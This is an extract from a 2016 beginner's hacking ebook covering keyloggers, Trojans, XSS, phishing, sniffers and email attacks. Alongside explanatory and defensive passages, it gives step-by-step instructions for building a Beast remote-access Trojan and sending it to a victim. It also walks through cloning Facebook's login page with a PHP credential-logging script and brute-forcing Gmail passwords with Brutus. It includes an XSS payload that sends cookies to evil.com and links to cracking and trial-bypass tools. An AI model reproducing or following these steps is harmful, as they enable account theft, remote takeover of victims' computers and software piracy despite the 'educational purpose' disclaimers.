Use The Trial Version Of Software Forever
1. Open Time Stopper
2. Select Exe File Of Trial Version Software
3. Select A New Date
4. Enter Any Name For New Exe File
5. Click On Create Desktop Shortcut
After That We Have To Install This New Exe File, The Installed Software Will Be Same
As Original (Purchased Software).
Download Time Stopper : http://www57.zippyshare.com/v/KDd3rw8H/file.html
Microsoft Office Hacking
As We Know That We Can Set Any Password In Any File Of Microsoft Office Like Word,
Excel, Power Point Etc. But Hackers Can Break This Security Password With The Help
Of Software Called MS Office Password Recovery. It Traces The Password Of File
Using Brute Force Attack Technique.
1. Open Password Unlocker
2. Open Target File
3. Click On Start
You Will Get Password Within Sometimes..
Download MS Office P.R. : http://www34.zippyshare.com/v/m4VKFoyI/file.html
...
H4CK3R : A Beginner’s Guide
2016
Page 53
H4CK3R : A Beginner’s Guide
2016
Page 54
11. Keylogger
Keylogger is a software program or hardware device that is used to monitor and log each
of the keys a user types into a computer keyboard. The user who installed the program
or hardware device can then view all keys typed in by that user. Because these
programs and hardware devices monitor the keys typed in a user can easily find user
passwords and other information a user may not wish others to know about. Keyloggers,
as a surveillance tool, are often used by employers to ensure employees use work
computers for business purposes only. Unfortunately, keyloggers can also be embedded
in spyware allowing your information to be transmitted to an unknown third party.
About Keyloggers :
A keylogger is a program that runs in the background, recording all the keystrokes.
Once keystrokes are logged, they are hidden in the machine for later retrieval, or
shipped raw to the attacker. The attacker then peruses them carefully in the hopes of
either finding passwords, or possibly other useful information that could be used to
compromise the system or be used in a social engineering attack. For example, a
keylogger will reveal the contents of all e-mail composed by the user. Keylogger is
commonly included in rootkits.
A keylogger normally consists of two files: a DLL which does all the work and an EXE
which loads the DLL and sets the hook. Therefore when you deploy the hooker on a
system, two such files must be present in the same directory.
There Are Other Approaches To Capturing Info About What You Are
Doing.
Somekeyloggerscapture screens, rather than keystrokes.
Otherkeyloggerswill secretly turn on video or audio recorders, and transmit what
they capture over your internet connection.
A keyloggers might be as simple as an exe and a dll that are placed on a machine and
invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these
features :
Stealth: invisible in process list
Includes kernel keylogger driver that captures keystrokes even when user is
logged off (Windows 2000 / XP)
ProBot program files and registry entries are hidden (Windows 2000 / XP)
Includes Remote Deployment wizard
Active window titles and process names logging
H4CK3R : A Beginner’s Guide
2016
Page 55
Keystroke / password logging
Regional keyboard support
Keylogging in NT console windows
Launched applications list
Text snapshots of active applications.
Visited Internet URL logger
Capture HTTP POST data (including logins/passwords)
File and Folder creation/removal logging
Mouse activities
Workstation user and timestamp recording
Log file archiving, separate log files for each user
Log file secure encryption
Password authentication
Invisible operation
Native GUI session log presentation
Easy log file reports with Instant Viewer 2 Web interface
HTML and Text log file export
Automatic E-mail log file delivery
Easy setup & uninstall wizards
Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP
Because a keylogger can involve dozens of files, and has as a primary goal complete
stealth from the user, removing one manually can be a terrifying challenge to any
computer user. Incorrect removal efforts can result in damage to the operating system,
instability, inability to use the mouse or keyboard, or worse. Further, some key loggers
will survive manual efforts to remove them, re-installing themselves before the user
even reboots.
Download REFOG Key Logger : https://www.refog.com
...
H4CK3R : A Beginner’s Guide
2016
Page 56
12. Trojans
A Trojan is a malicious program misguided as some very important application. Trojans
comes on the backs of other Programs and are installed on a system without the User’s
knowledge. Trojans are malicious pieces of code used to install hacking software on a
target system and aid the Hacker in gaining and retaining access to that system.
Trojans and their counterparts are important pieces of the Hacker’s tool-kit.
Trojans is a program that appears to perform a desirable and necessary function but
that, because of hidden and Unauthorized code, performs functions unknown and
unwanted by the user. These downloads are fake programs which seems to be a original
application, it may be a software like monitoring program, system virus scanners,
registry cleaners, computer system optimizers, or they may be applications like songs,
pictures, screen savers, videos, etc..
You just need to execute that software or application, you will find the
application running or you might get an error, but once executed the Trojan will
install itself in the system automatically.
Once installed on a system, the program then has system-level access on the
target system, where it can be destructive and insidious. They can cause data
theft and loss, and system crashes or slowdowns; they can also be used as
launching points for other attacks against your system.
Many Trojans are used to manipulate files on the victim computer, manage
processes, remotely run commands, intercept keystrokes, watch screen images,
and restart or shut down infected hosts.
Different Types of Trojans
1. Remote Administration Trojans: There are Remote Access Trojans which are
used to control the Victim’s Computer remotely.
2. Data Stealing Trojans: Then there are Data Sending Trojans which compromised
the data in the Victim’s computer, then find the data on the computer and send it
to the attacker automatically.
3. Security Disabler Trojan: There are Security software disablers Trojans which
are used to stop antivirus software running in the Victim’s computer.
In most of the cases the Trojan comes as a Remote Administration Tools which turns the
Victim’s computer into a server which can controlled remotely. Once the Remote Access
Trojan is installed in the system, the attacker can connect to that computer and can
control it.
H4CK3R : A Beginner’s Guide
2016
Page 57
Components of Trojans :
Trojan consists of two parts :
1. A Client component
2. A Server component.
One which resides on the Victim’s computer is called the server part of the Trojan and
the one which is on the attacker’s computer is called the client Part of the Trojan. For
the Trojan to function as a backdoor, the server Component has to be installed on the
Victim’s machine.
Page 46
1. Server component of the Trojan opens a port in the Victim’s computer and
invites the Attacker to connect and administrate the computer.
2. Client component of the Trojan tries to connect the Victim’s computer and
administrate the computer without the permission of the User.
Wrapper
A Wrapper is a program used to combine two or more executables into a single packaged
program. The wrapper attaches a harmless executable, like a game, to a Trojan’s
payload, the executable code that does the real damage, so that it appears to be a
harmless file.
Hackers use Wrappers to bind the Server part of the Software behind any image or any
other file. Wrappers are also known as Binders.
Generally, games or other animated installations are used as wrappers because they
entertain the user while the Trojan in being installed. This way, the user doesn’t notice
the slower processing that occurs while the Trojan is being installed on the systemthe
user only sees the legitimate application being installed.
Reverse Connection in Trojans :
Reverse-connecting Trojans let an attacker access a machine on the internal network
from the outside. The Hacker can install a simple Trojan program on a system on the
internal network. On a regular basis (usually every 60 seconds), the internal server tries
to access the external master system to pick up commands. If the attacker has typed
something into the master system, this command is retrieved and executed on the
internal system. Reverse WWW shell uses standard HTTP. It’s dangerous because it’s
difficult to detect - it looks like a client is browsing the Web from the internal network
Now the final part...
Detection and Removal of Trojans :
The unusual behavior of system is usually an indication of a Trojan attack.
Actions/symptoms such as,
Programs starting and running without the User’s initiation.
CD-ROM drawers Opening or Closing.
Wallpaper, background, or screen saver settings changing by themselves.
Screen display flipping upside down.
Browser program opening strange or unexpected websites
H4CK3R : A Beginner’s Guide
2016
Page 58
All above are indications of a Trojan attack. Any action that is suspicious or not initiated
by the user can be an indication of a Trojan attack.
One thing which you can do is to check the applications which are making network
connections with other computers.
One of those applications will be a process started by the Server Trojan.
You also can use the software named process explorer which monitors the processes
executed on the computer with its original name and the file name. As there are some
Trojans who themselves change their name as per the system process which runs on the
computer and you cannot differentiate between the Trojan and the original system
process in the task manager processes tab, so you need PROCESS EXPLORER.
Countermeasures for Trojan Attacks :
Most commercial antivirus programs have Anti-Trojan capabilities as well as spy ware
detection and removal functionality. These tools can automatically scan hard drives on
startup to detect backdoor and Trojan programs before they can cause damage. Once a
system is infected, it’s more difficult to clean, but you can do so with commercially
available tools. It’s important to use commercial applications to clean a system instead
of freeware tools, because many freeware removal tools can further infect the system. In
addition, port monitoring tools can identify ports that have been opened or files that
have changed.
The key to preventing Trojans and backdoors from being installed on a system is to not
to install applications downloaded from the Internet or open Email attachments from
parties you don’t know. Many systems administrators don’t give users the system
permissions necessary to install programs on system for the very same reason.
Making a Trojan using Beast v2.06
Download Beast v2.06 : http://www29.zippyshare.com/v/qVlgO9tt/file.html
& Follow These Simple Steps :
1. Open the software you will get the screen as shown below.
2. Now click on “Build server “button.
3. Now in this window click on the notifications tab.
4. In the notifications tab click on the e-mail button.
5. Now In this window fill your proper and valid email id.
6. Now go to "AV-FW kill” tab.
7. Now In this put a tick mark on the “disable XP firewall ".
8. Now click on "EXE icontab.
9. In this tab select any icon for the file from the list or you can browse the icon
from the directory and can use it.
10. Now click on the”Save Server” button and the Trojan will be made.
11. Now send this Trojan File to victim.
12. As and when the victim will install the Trojan on his system you will get a
notification e-mail on your specified email
13. id while making the Trojan. This Email consists of the IP address and port of the
victim.
14. Put This IP address and Port in the place shown in the below snap-shot.
15. After That Click on the "Go Beast” Button and You will be connected to victims
PC.
H4CK3R : A Beginner’s Guide
2016
Page 59
16. Now select the action or task you want to execute on victims PC form the given
list.
17. Now to destroy or kill the Trojan click on the “server “tab from the menu.
18. Now click on the “Kill Server “button and the Trojan will be destroyed from the
victims PC.
19. You are Done Now.
& Please Do Not Harm or Destroy any ones PC, This Tutorial is Only for Educational
Purpose.”
...
H4CK3R : A Beginner’s Guide
2016
Page 60
13. Cross Site Scripting (XSS)
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker
can execute malicious scripts (also commonly referred to as a malicious payload) into a
legitimate website or web application. XSS is amongst the most rampant of web
application vulnerabilities and occurs when a web application makes use of unvalidated
or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker
would exploit a vulnerability within a website or web application that the victim would
visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to
the victim’s browser.
While XSS can be taken advantage of within VBScript, ActiveX and Flash (although
now considered legacy or even obsolete), unquestionably, the most widely abused is
JavaScript primarily because JavaScript is fundamental to most browsing
experiences.
How Cross-site Scripting Works?
In order to run malicious JavaScript code in a victim’s browser, an attacker must first
find a way to inject a payload into a web page that the victim visits. Of course, an
attacker could use social engineering techniques to convince a user to visit a vulnerable
page with an injected JavaScript payload.
In order for an XSS attack to take place the vulnerable website needs to directly include
user input in its pages. An attacker can then insert a string that will be used within the
web page and treated as code by the victim’s browser.
The following server-side pseudo-code is used to display the most recent comment on a
web page.
print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"
The above script is simply printing out the latest comment from a comments database
and printing the contents out to an HTML page, assuming that the comment printed out
only consists of text.
The above page is vulnerable to XSS because an attacker could submit a comment that
contains a malicious payload such as <script>doSomethingEvil();</script>.
H4CK3R : A Beginner’s Guide
2016
Page 61
Users visiting the web page will get served the following HTML page.
<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>
When the page loads in the victim’s browser, the attacker’s malicious script will execute,
most often without the user realizing or being able to prevent such an attack.
Important Note An XSS vulnerability can only exist if the payload (malicious script)
that the attacker inserts ultimately get parsed (as HTML in this case) in the victim’s
browser.
What’s the worst an attacker can do with JavaScript?
The consequences of what an attacker can do with the ability to execute JavaScript on a
web page may not immediately stand out, especially since browsers run JavaScript in a
very tightly controlled environment and that JavaScript has limited access to the user’s
operating system and the user’s files.
However, when considering that JavaScript has access to the following, it’s easier to
understand how creative attackers can get with JavaScript.
Malicious JavaScript has access to all the same objects the rest of the web page
has, including access to cookies. Cookies are often used to store session tokens, if
an attacker can obtain a user’s session cookie, they can impersonate that user.
JavaScript can read and make arbitrary modifications to the browser’s DOM
(within the page that JavaScript is running).
JavaScript can use XMLHttpRequest to send HTTP requests with arbitrary content
to arbitrary destinations.
JavaScript in modern browsers can leverage HTML5 APIs such as accessing a
user’s geolocation, webcam, microphone and even the specific files from the user’s
file system. While most of these APIs require user opt-in, XSS in conjunction
with some clever social engineering can bring an attacker a long way.
The above, in combination with social engineering, allow attackers to pull off advanced
attacks including cookie theft, keylogging, phishing and identity theft. Critically, XSS
vulnerabilities provide the perfect ground for attackers to escalate attacks to more
serious ones.
“Isn’t Cross-Site Scripting The User’s Problem?”
If an attacker can abuse a XSS vulnerability on a web page to execute arbitrary
JavaScript in a visitor’s browser, the security of that website or web application and its
users has been compromised XSS is not the user’s problem, like any other security
vulnerability, if it’s affecting your users, it will affect you.
The Anatomy Of A Cross-Site Scripting Attack :
An XSS attack needs three actors the website, the victim and the attacker.
H4CK3R : A Beginner’s Guide
2016
Page 62
In the example below, it shall be assumed that the attacker’s goal is to impersonate the
victim by stealing the victim’s cookie. Sending the cookie to a server the attacker
controls can be achieved in a variety of ways, one of which is for the attacker to execute
the following JavaScript code in the victim’s browser through an XSS vulnerability.
<script>
window.location=“http://evil.com/?cookie=” + document.cookie
</script>
The figure below illustrates a step-by-step walkthrough of a simple XSS attack.
The attacker injects a payload in the website’s database by submitting a
vulnerable form with some malicious JavaScript
The victim requests the web page from the website
The website serves the victim’s browser the page with the attacker’s payload as
part of the HTML body.
The victim’s browser will execute the malicious script inside the HTML body. In
this case it would send the victim’s cookie to the attacker’s server. The attacker
now simply needs to extract the victim’s cookie when the HTTP request arrives to
the server, after which the attacker can use the victim’s stolen cookie for
impersonation.
Some Examples Of Cross-Site Scripting Attack Vectors
The following is a non-exhaustive list of XSS attack vectors that an attacker could use to
compromise the security of a website or web application through an XSS attack. A more
extensive list of XSS payload examples is maintained here. :
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
<script> tag
The <script> tag is the most straight-forward XSS payload. A script tag can either
reference external JavaScript code, or embed the code within the script tag.
H4CK3R : A Beginner’s Guide
2016
Page 63
<body> tag
An XSS payload can be delivered inside <body> tag by using the onload attribute or
other more obscure attributes such as the background attribute.
<img> tag
Some browsers will execute JavaScript when found in the <img>.
<iframe> tag
The <iframe> tag allows the embedding of another HTML page into the parent page. An
IFrame can contain JavaScript, however, it’s important to note that the JavaScript in
the iFrame does not have access to the DOM of the parent’s page do to the browser’s
Content Security Policy (CSP). However, IFrames are still very effective means of
pulling off phising attacks.
<input> tag
In some browsers, if the type attribute of the <input> tag is set to image, it can be
manipulated to embed a script.
<link> tag
The <link> tag, which is often used to link to external style sheets could contain a script.
<table> tag
The background attribute of the table and td tags can be exploited to refer to a script
instead of an image.
<div> tag
The <div> tag, similar to the <table> and <td> tags can also specify a background and
therefore embed a script.
<object> tag
The <object> tag can be used to include in a script from an external site.
...
H4CK3R : A Beginner’s Guide
2016
Page 64
14. Phishing
What Is Phishing?
The act of sending an Email to a user falsely claiming to be an established legitimate
enterprise in an attempt to scam the user into surrendering private information that
will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal
information, such as Passwords and credit card, social security, and bank account
numbers, that the legitimate organization already has. The Web site, however, is Bogus
and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be
Emails inviting you to join a Social Group, asking you to Login using your
Username and Password.
Email saying that Your Bank Account is locked and Sign in to Your Account to
Unlock IT.
Emails containing some Information of your Interest and asking you to Login to
Your Account.
Any Email carrying a Link to Click and asking you to Login.
How To Create A Phishing Hack Page ?
This Hack Example Is For Facebook Account.
The Hacker can now wreak ungodly amounts of havoc on a person’s social life. If it
happens to be a business’s Facebook profile, they can damage their business. Today,
however, we are going to setup an imitation Facebook login page to show you just how
easy it is to start phishing. Let’s take a closer look at the steps required..
H4CK3R : A Beginner’s Guide
2016
Page 65
1. Pull up Facebook.com in your browser. Then, right click on the website’s login
page. You should see an option along the lines of “view source page.Click on
this option and you should be able to view the code behind this page.
2. Go ahead and dump all of the page’s source code into Notepad (or your
operating system’s best simple text editor.
3. If using Notepad, hit ctrl + f (which is the find hotkey) and search for action.
4. You should see a line that looks like this :
action=”https://www.facebook.com/login.php?login_attempt=1″
5. Delete everything contained in the quotations, and instead fill the quotes
with post.php. Now it should read action=”post.php”
6. Save this file somewhere on your computer with the file name of index.htm.
Omit the final period from the filename. This is going to become your
phishing page.
7. Next, create a new notepad document with the name of post.php. Omit the
final period from the filename. Copy and paste the following code into this
document, and remember to save it :
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
8. At this point, you should now have two files saved: index.htm and post.php.
9. Next, this code actually needs to be uploaded to a web hosting service. There
are free hosting providers, but I wouldn’t recommend you actually post this
code. Instead, it would be better to try this at home on your own webserver.
However, for the rest of the tutorial, we’ll be using 000Webhost.
10. After you have signed up for an account, browse to the control panel, and
then to file manager.
11. Once the window opens, go to publick_html.
12. Delete default.php, and then upload index.htm and post.php.
H4CK3R : A Beginner’s Guide
2016
Page 66
13. Next, click on a preview of index.htm. As you’ll notice, it should look nearly
identical to the Facebook login page.
14. The URL of this page is what needs to be linked to in an attack. Sometimes
attackers imbed this false link on other websites, forums, popup ads, and
even emails.
15. Now go back to the file manager and public_html. There should be a file
labeled username.txt.
16. Open this file and you should be able to see login credentials that have been
entered by a test user.
It really is a simple matter of copying the code from the Facebook login screen, adding
some php code, and then setting up a dummy website. Again, don’t try this in the real
world, because the consequences could be terrible. However, in a home environment on
your own web server, this tutorial provides great insight into how attackers phish for
usernames and passwords.
Prevention Against Phishing
Read all the Email Carefully and Check if the Sender is Original.
Watch the Link Carefully before Clicking
Always check the URL in the Browser before Signing IN to your Account
Always Login to Your Accounts after opening the Trusted Websites, not by
Clicking in any other Website or Email.
“Do Not Use This Hack Trick In Any Criminal Activities Like Phishing Bank
Websites And Please Do Not Destroy Any Ones Account This Is Only For
Educational Purpose”
.....
H4CK3R : A Beginner’s Guide
2016
Page 67
15. Sniffers
Sniffers are almost as old as the Internet itself. They are one of the first tools that
allowed system administrators to analyze their network and pinpoint where a problem
is occurring. Unfortunately, crackers also run sniffers to spy on your network and steal
various kinds of data. This paper discusses what a sniffer is, some of the more popular
sniffers, and ways to protect your network against them. It also talks about a popular
tool called Antisniff, which allows you to automatically detect sniffers running on your
network.
What Are Sniffers ?
In a non-switched network, Ethernet frames broadcast to all machines on the network,
but only the computer that the packets are destined for will respond. All of the other
machines on that network still see the packet, but if they are not the intended receiver,
they will disregard it. When a computer is running sniffer software and it’s network
interface is in promiscuous mode (where it listens for ALL traffic), then the computer
has the ability to view all of the packets crossing the network.
If you are an Internet history buff and have been wondering where the term sniffer
came from. Sniffer was a product that was originally sold by Network General. It
became the market leader and people starting referring to all network analyzers as
“sniffers.” I guess these are the same people who gave the name Q-Tip to cotton swabs.
Who Uses Sniffers ?
LAN/WAN administrators use sniffers to analyze network traffic and help determine
where a problem is on the network. A security administrator could use multiple sniffers,
strategically placed throughout their network, as an intrusion detection system. Sniffers
are great for system administrators, but they are also one of the most common tools a
hacker uses.
Crackers install sniffers to obtain usernames, passwords, credit card numbers, personal
information, and other information that could be damaging to you and your company if
it turned up in the wrong hands. When they obtain this information, crackers will use
the passwords to attack other Internet sites and they can even turn a profit from selling
credit card numbers.
Defeating Sniffers
One of the most obvious ways of protecting your network against sniffers is not to let
them get broken into in the first place. If a cracker cannot gain access to your system,
then there is no way for them to install a sniffer onto it. In a perfect world, we would be
able to stop here. But since there are an unprecedented number of security holes found
each month and most companies don’t have enough staff to fix these holes, then crackers
are going to exploit vulnerabilities and install sniffers. Since crackers favor a central
location where the majority of network traffic passes (i.e. Firewalls, proxies), then these
are going to be their prime targets and should be watched closely. Some other possible
H4CK3R : A Beginner’s Guide
2016
Page 68
“victims” where crackers like to install sniffers are next to servers where personal
information can be seen (i.e. Webservers, SMTP servers).
A good way to protect your network against sniffers is to segment it as much as possible
using Ethernet switches instead of regular hubs. Switches have the ability to segment
your network traffic and prevent every system on the network from being able to “see”
all packets. The drawback to this solution is cost. Switches are two to three times more
expensive then hubs, but the trade-off is definitely worth it. Another option, which you
can combine with a switched environment, is to use encryption. The sniffer still sees the
traffic, but it is displayed as garbled data. Some drawbacks of using encryption are the
speed and the chance of you using a weak encryption standard that can be easily
broken. Almost all encryption will introduce delay into your network. Typically, the
stronger the encryption, the slower the machines using it will communicate. System
administrators and users have to compromise somewhere in the middle. Even though
most system administrators would like to use the best encryption on the market, it is
just not practical in a world where security is seen as a profit taker, not a profit maker.
Hopefully the new encryption standard that should be out shortly, AES (Advanced
Encryption Standard), will provide strong enough encryption and transparency to the
user to make everybody happy.
Some form of encryption is better then no encryption at all. If a cracker is running a
sniffer on your network and notices that all of the data that he (or she) is collecting is
garbled, then most likely they will move on to another site that does not use encryption.
But a paid or determined hacker is going to be able to break a weak encryption
standard, so it is better to play it smart and provide the strongest encryption as long as
it will not have everybody giving you dirty looks when you walk down the halls at work.
AntiSniff
In 1999, our buddies at L0pht Heavy Industries released a product called Antisniff. This
product attempts to scan your network and determine if a computer is running in
promiscuous mode. This is a helpful tool because if a sniffer is detected on your network,
then 9 times out of 10, the system has been compromised. This happened to the
Computer Science Department at California State University Stanislaus. Here is what
they posted on their local website: “A sniffer program has been found running on the
Computer Science network. Sniffer programs are used to capture passwords. In order to
protect yourself please change your password. Do not use a word out of a dictionary, put
a number on the end of a word or use proper names. Be inventive, use special characters
and have 8 characters in your password.” I am sure there are hundreds of similar
postings on internal websites throughout the world that don’t make it public as they
have.
Antisniff also helps you find those system administrators who run a sniffer to find out
what is wrong with their local network, but forget to ask for authorization beforehand. If
you need to run a sniffer, then you should get permission in writing. If your Security
Administrator is running Antisniff, then there is a good chance they will find it and you
will have to explain why you are running a sniffer without authorization. Hopefully your
security policy has a section on sniffers and will provide some guidance if you need to
run a sniffer. at the time of this writing, Antisniff version 1.021 is the current release.
There is a nice GUI available for Windows 95/98/and NT machines. A command line
version is also available for Solaris, OpenBSD, and Linux. This version of Antisniff only
works in a “flat non-switched” environment. If your network is designed with routers
H4CK3R : A Beginner’s Guide
2016
Page 69
and switches, then Antisniff does not have the same functionality as in a non-switched
environment. You can only use it on local networks that do not cross a router or switch.
According to Lopht’s website, the next major release of Antisniff will have the ability to
figure out if a computer is running in promiscuous mode over routers and switches. The
next release of Antisniff should definitely be more beneficial to system administrators
because the price of switches are coming down and most companies are upgrading to
switches to obtain 100/Full Mbps speeds. Even though you have a totally switched
environment, you are still not out of the water. There are still firewalls, proxies,
webservers, ftp servers, etc. where crackers still have the ability to install a sniffer and
capture data locally. The only difference is, you have taken away their ability to capture
data over the network.
Antisniff can also be used by blackhats to find intrusion detection systems. If they know
where your intrusion detection systems are, then they can become stealth attackers,
causing you much pain because you just spend $150,000 on a new intrusion detection
system and they found a way to bypass it..
...
H4CK3R : A Beginner’s Guide
2016
Page 70
16. Email Hacking
How Email Works?
Email sending and receiving is controlled by the Email servers. All Email service
providers configure Email Server before anyone can Sign into his or her account
and start communicating digitally.
Once the servers are ready to go, users from across the world register in to these
Email servers and setup an Email account. When they have a fully working
Email account, they sign into their accounts and start connecting to other users
using the Email services.
Email Travelling Path
Let’s say we have two Email providers, one is Server1.com and other is
Server2.in, ABC is a registered user in Server1.com and XYZ is a registered user
in Server2.in.
ABC signs in to his Email account in Server1.com, he then writes a mail to the
xyz@server2.in and click on Send and gets the message that the Email is sent
successfully.
But what happens behind the curtains, the Email from the computer of
abc@server1.com is forwarded to the Email server of Server1.com. Server1 then
looks for server2.in on the internet and forwards the Email of the server2.in for
the account of XYZ. Server2.in receives the Email from server1.com and puts it in
the account of XYZ.
XYZ then sits on computer and signs in to her Email account. Now she has the
message in her Email inbox.
Email Service Protocols
SMTP : SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is
delivered from an Email client, such as Outlook Express, to an Email server or when
Email is delivered from one Email server to another. SMTP uses port 25.
POP3 : POP3 stands for Post Office Protocol. POP3 allows an Email client to download
an Email from an Email server. The POP3 protocol is simple and does not offer many
features except for download. Its design assumes that the Email client downloads all
available Email from the server, deletes them from the server and then disconnects.
POP3 normally uses port 110.
IMAP : IMAP stands for Internet Message Access Protocol. IMAP shares many similar
features with POP3. It, too, is a protocol that an Email client can use to download Email
from an Email server. However, IMAP includes many more features than POP3. The
IMAP protocol is designed to let users keep their Email on the server. IMAP requires
more disk space on the server and more CPU resources than POP3, as all Emails are
stored on the server. IMAP normally uses port 143.
H4CK3R : A Beginner’s Guide
2016
Page 71
Configuring an Email Server
Email server software like Post cast Server, Hmailserver, Surge mail, etc can be
used to convert your Desktop PCinto an Email sending server.
HMailServer is an Email server for Microsoft Windows. It allows you to handle
all your Email yourself without having to rely on an Internet service provider
(ISP) to manage it. Compared to letting your ISP host your Email, HMailServer
adds flexibility and security and gives you the full control over spam protection.
Email Security
Now let’s check how secure this fast mean of communication is. There are so
many attacks which are applied on Emails. There are people who are the masters
of these Email attacks and they always look for the innocent people who are not
aware of these Email tricks and ready to get caught their trap.
You have to make sure that you are not an easy target for those people. You have
to secure your Email identity and profile, make yourself a tough target.
If you have an Email Id Do not feel that it does not matters if hacked because
there is no important information in that Email account, because you do not
know if someone gets your Email id password and uses your Email to send a
threatening Email to the Ministry or to the News Channels.
Attacker is not bothered about your data in the Email. He just wants an Email
ID Victim which will be used in the attack. There are a lots of ways by which one
can use your Email in wrong means, i am sure that you would have come across
some of the cased where a student gets an Email from his friends abusing him or
cases on Porn Emails where the owner of the Email does not anything about the
sent Email.
Email Spoofing
Email spoofing is the forgery of an Email header so that the message appears to
have originated from someone or somewhere other than the actual source.
Distributors of spam often use spoofing in an attempt to get recipients to open,
and possibly even respond to, their solicitations. Spoofing can be used
legitimately.
There are so many ways to send the Fake Emails even without knowing the
password of the Email ID. The Internet is so vulnerable that you can use
anybody's Email ID to send a threatening Email to any official personnel.
Methods To Send Fake Emails
1. Open Relay Server
2. Web Scripts
Fake Emails : Open Relay Server
An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol) server
configured in such a way that it allows anyone on the Internet to send Email
through it, not just mail destined ‘To’ or ‘Originating’ from known users.
An Attacker can connect the Open Relay Server via Telnet and instruct the
server to send the Email.
H4CK3R : A Beginner’s Guide
2016
Page 72
Open Relay Email Server requires no password to send the Email.
Fake Emails : Via Web Script
Web Programming languages such as PHP and ASP contain the mail sending
functions which can be used to send Emails by programming Fake headers i.e.”
From: To: Subject:”
There are so many websites available on the Internet which already contains
these mail sending scripts. Most of them provide the free service.
Some of Free Anonymous Email Websites are :
Mail.Anonymizer.name (Send attachments as well)
FakEmailer.net
FakEmailer.info
Deadfake.com
PHP Mail Sending Script
<?php
// the message
$msg = "First line of text\nSecond line of text";
// use wordwrap() if lines are longer than 70 characters
$msg = wordwrap($msg,70);
// send email
mail("someone@example.com","My subject",$msg);
?>
Consequences Of Fake Emails
Email from your Email ID to any Security Agency declaring a Bomb Blast can
make you spend rest of your life behind the iron bars.
Email from you to your Girl friend or Boy friend can cause Break-Up and set
your friend’s to be in relationship.
Email from your Email ID to your Boss carrying your Resignation Letter or
anything else which you can think of.
There can be so many cases drafted on Fake Emails.
Proving A Fake Email
Every Email carry Header which has information about the Travelling Path of
the Email
Check the Header and Get the location from the Email was Sent
Check if the Email was sent from any other Email Server or Website
Headers carry the name of the Website on which the mail sending script was
used.
H4CK3R : A Beginner’s Guide
2016
Page 73
Email Bombing
Email Bombing is sending an Email message to a particular address at a specific
victim site. In many instances, the messages will be large and constructed from
meaningless data in an effort to consume additional system and network
resources. Multiple accounts at the target site may be abused, increasing the
denial of service impact.
Email Spamming
Email Spamming is a variant of Bombing; it refers to sending Email to hundreds
or thousands of users (or to liststhat expand to that many users). Email
spamming can be made worse if recipients reply to the Email, causing allthe
original addressees to receive the reply. It may also occur innocently, as a result
of sending a message tomailing lists and not realizing that the list explodes to
thousands of users, or as a result of a responder message (such as vacation(1))
that is setup incorrectly.
Email Password Hacking
There is no specified attack available just to hack the password of Email
accounts. Also, it is not so easy to compromise the Email server like Yahoo,
Gmail, etc.
Email Password Hacking can be accomplished via some of the Client Side
Attacks. We try to compromise the user and get the password of the Email
account before it reaches the desired Email server.
We will cover many attacks by the workshop flows, but at this time we will talk
about the very famous 'Phishing attack'.
Phishing
The act of sending an Email to a user falsely claiming to be an established
legitimate enterprise in an attempt toscam the user into surrendering private
information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update
personal information, such as passwords and credit card, social security, and
bank account numbers, that the legitimate organization alreadyhas. The Web
site, however, is Bogus and set up only to steal the User’s information.
Phishing Scams Could Be
Emails inviting you to join a Social Group, asking you to Login using your
Username and Password.
Email saying that Your Bank Account is locked and Sign in to Your Account to
Unlock IT.
Emails containing some Information of your Interest and asking you to Login to
Your Account.
Any Email carrying a Link to Click and asking you to Login.
H4CK3R : A Beginner’s Guide
2016
Page 74
Prevention Against Phishing
Read all the Email Carefully and Check if the Sender is Original
Watch the Link Carefully before Clicking
Always check the URL in the Browser before Signing IN to your Account
Always Login to Your Accounts after opening the Trusted Websites, not by
Clicking in any other Website or Email.
Email Tracing
Tracing an Email means locating the Original Sender and Getting to know the IP
address of the network from which the Email was actually generated.
To get the information about the sender of the Email we first must know the
structure of the Email.
As we all know the travelling of the Email. Each message has exactly one header,
which is structured into fields. Each field has a name and a value. Header of the
Email contains all the valuable information about the path and the original
sender of the Email.
For tracing an email Address You need to go to your email account and log into
the email which you want to trace after that you have to find the header file of
the email which is received by you..
Email Hacking Using Keyloggers
Keystroke Loggers (or Key loggers) intercept the Target’s keystrokes and either
saves them in a file to be read later, or transmit them to a predetermined
destination accessible to the Hacker.
Since Keystroke logging programs record every keystroke typed in via the
keyboard, they can capture a wide variety of confidential information, including
passwords, credit card numbers, and private Email correspondence, names,
addresses, and phone numbers.
Types Of Keyloggers
Hardware keylogger
Software keylogger
(For More Information About Keylogger Read Article 11. Keylogger)
 
H4CK3R : A Beginner’s Guide
2016
Page 75
Email Hacking Using Brutus AET2
As We Know That We Have Some Passwords For Our Email Ids And We Need These
Passwords To Open Email Ids, We Can't Access Any Email Id Without Password, But
Hackers Can Hack The Password Of Email Ids.. BRUTUS Is Software That Is Used To
Trace The Password Of Any Email Id. This Software Works On The Concept Of Brute
Force Attack. The Speed Of Working Of This Software Completely Depends On The
Speed Of Internet..
How To Use ? (This Example Is For Gmail)
1. Open Brutus
2. Select pop3 in type option
3. Write pop address of target email server in target option (ex. : pop.gmail.com)
4. Select Brute Force option in pass mode
5. Enter Email ID in user file option (ex : example@gmail.com)
6. Click On Start
H4CK3R : A Beginner’s Guide
2016
Page 76
After Some Time, It Will Show The Password Of Email Id. It May Take An Hour To
Trace That..
Download Brutus AET2 : http://www107.zippyshare.com/v/rS7YQw9g/file.html
YouTube Tutorial : https://www.youtube.com/watch?v=TQvRT-feHjU
